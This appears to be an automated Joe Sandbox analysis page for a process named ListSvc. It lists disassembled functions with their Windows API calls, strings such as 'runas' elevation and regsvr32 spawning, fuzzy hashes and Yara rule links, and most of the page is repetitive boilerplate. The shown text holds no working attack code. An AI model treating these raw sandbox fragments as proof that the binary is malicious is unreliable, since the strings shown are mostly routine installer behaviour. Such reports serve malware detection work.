Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 254331816-221126205
Opcode ID: 4b01546bb7c1e1f880d0074e3a62ab49537264529600a4ba05fbe354f8589c55
Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
Opcode Fuzzy Hash: 4b01546bb7c1e1f880d0074e3a62ab49537264529600a4ba05fbe354f8589c55
Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29

Uniqueness

Uniqueness Score: -1.00%

Function 00625D14, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00625D4B
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
GetExitCodeProcess.KERNEL32 ref: 00625D86
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9

Strings

Helper process exited., xrefs: 00625D95
Helper process exited, but failed to get exit code., xrefs: 00625DBF
Helper isn't responding; killing it., xrefs: 00625D57
Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
Helper process exited with failure code: 0x%x, xrefs: 00625DB3

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: 39883d29d795098f418b7966fdcadf6d747d73cc4ff91dfa499128bca298669b
Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
Opcode Fuzzy Hash: 39883d29d795098f418b7966fdcadf6d747d73cc4ff91dfa499128bca298669b
Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A

Uniqueness

Uniqueness Score: -1.00%

Function 006B740C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
SetWindowLongW.USER32 ref: 006B74F0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
MsgWaitForMultipleObjects.USER32 ref: 006B7599
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7

Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996

DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD

Strings

STATIC, xrefs: 006B74D6
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 006B7554
(\m, xrefs: 006B7498

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 1779715363-1630723103
Opcode ID: 590c0ad9364cb792a84a58c9118fcebc7ede51f51827efcc5232604c532853bb
Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
Opcode Fuzzy Hash: 590c0ad9364cb792a84a58c9118fcebc7ede51f51827efcc5232604c532853bb
Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64

Uniqueness

Uniqueness Score: -1.00%

Function 00625FC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
MsgWaitForMultipleObjects.USER32 ref: 006260D7
GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

CreateEvent, xrefs: 0062602F
TransactNamedPipe, xrefs: 00626097

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
Opcode Fuzzy Hash: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079

Strings

en-US,en,, xrefs: 0040DFBE, 0040E065

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-US,en,
API String ID: 975949045-3579323720
Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF

Uniqueness

Uniqueness Score: -1.00%

Function 00624704, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 90COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0062481E,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0062A1C5,00000000,0062A1D9), ref: 0062472A

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062476E

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

GetProcAddress, xrefs: 0062473D
UnRegisterTypeLib, xrefs: 00624720
LoadTypeLib, xrefs: 00624779
OLEAUT32.DLL, xrefs: 00624725
ITypeLib::GetLibAttr, xrefs: 00624796
UnRegisterTypeLib, xrefs: 006247CC

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AddressErrorHandleLastLoadModuleProcType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1914119943-2711329623
Opcode ID: 222b5e7ee090e2c4018f0ee27552968bac4b15f90272fda75f58545e40cad072
Instruction ID: 47cd072b4b06506b06a7a0fd2e311c11a36de303591e536be68bff5c72022a6e
Opcode Fuzzy Hash: 222b5e7ee090e2c4018f0ee27552968bac4b15f90272fda75f58545e40cad072
Instruction Fuzzy Hash: 19219171610A146FDB14EFA9EC42D6B77EEEF897407124469F410D3291EF78EC008B64

Uniqueness

Uniqueness Score: -1.00%

Function 005C7FF4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 005C807D
GetUserDefaultUILanguage, xrefs: 005C8011
kernel32.dll, xrefs: 005C8016
Locale, xrefs: 005C805D
.DEFAULT\Control Panel\International, xrefs: 005C8045

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: f7e7be658f0a955c462c647893507e18f8cdc3df8b481e5329b6105bcbfa9dbc
Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
Opcode Fuzzy Hash: f7e7be658f0a955c462c647893507e18f8cdc3df8b481e5329b6105bcbfa9dbc
Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755

Uniqueness

Uniqueness Score: -1.00%

Function 00624BA8, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6

Strings

0x%x, xrefs: 00624CE9
CreateProcess, xrefs: 00624CB8
D, xrefs: 00624C7C
regsvr32.exe", xrefs: 00624BF7
/s ", xrefs: 00624C1F
Spawning 64-bit RegSvr32: , xrefs: 00624C41
Spawning 32-bit RegSvr32: , xrefs: 00624C5B
/u, xrefs: 00624C12

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: 9ce8fcc7bdafabcc66a0714f470f8e6e7717fe01addbd125e4d9ca934750157a
Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
Opcode Fuzzy Hash: 9ce8fcc7bdafabcc66a0714f470f8e6e7717fe01addbd125e4d9ca934750157a
Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336

Strings

<T@, xrefs: 00406300, 0040630B

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite
String ID: <T@
API String ID: 3320372497-2050694182
Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00628E3C, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00628FC2,?,00000000,?), ref: 00628F04

Part of subcall function 0060DFAC: FindClose.KERNEL32(000000FF,0060E0A1), ref: 0060E090

Strings

Failed to strip read-only attribute., xrefs: 00628ED2
Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00628EDE
Failed to delete directory (%d). Will retry later., xrefs: 00628F1D
Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00628F7B
Deleting directory: %s, xrefs: 00628E8B
Failed to delete directory (%d)., xrefs: 00628F9C
Stripped read-only attribute., xrefs: 00628EC6

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseErrorFindLast
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 754982922-1448842058
Opcode ID: 7fc0813c7db3ed8f80165e3b8539aa30754377e7929e0533272f97a4bbcf9ceb
Instruction ID: bb024c1df45f9af0c8d848e5c22ededdbf4d41f71593f538bf5593c1374477db
Opcode Fuzzy Hash: 7fc0813c7db3ed8f80165e3b8539aa30754377e7929e0533272f97a4bbcf9ceb
Instruction Fuzzy Hash: B5410330A11A285ECB00EB68DD053EE77E7AF84310F11842EB411D3382CFB48E45CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 005B83B6
IsWindowUnicode.USER32(00000000), ref: 005B83F9
SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

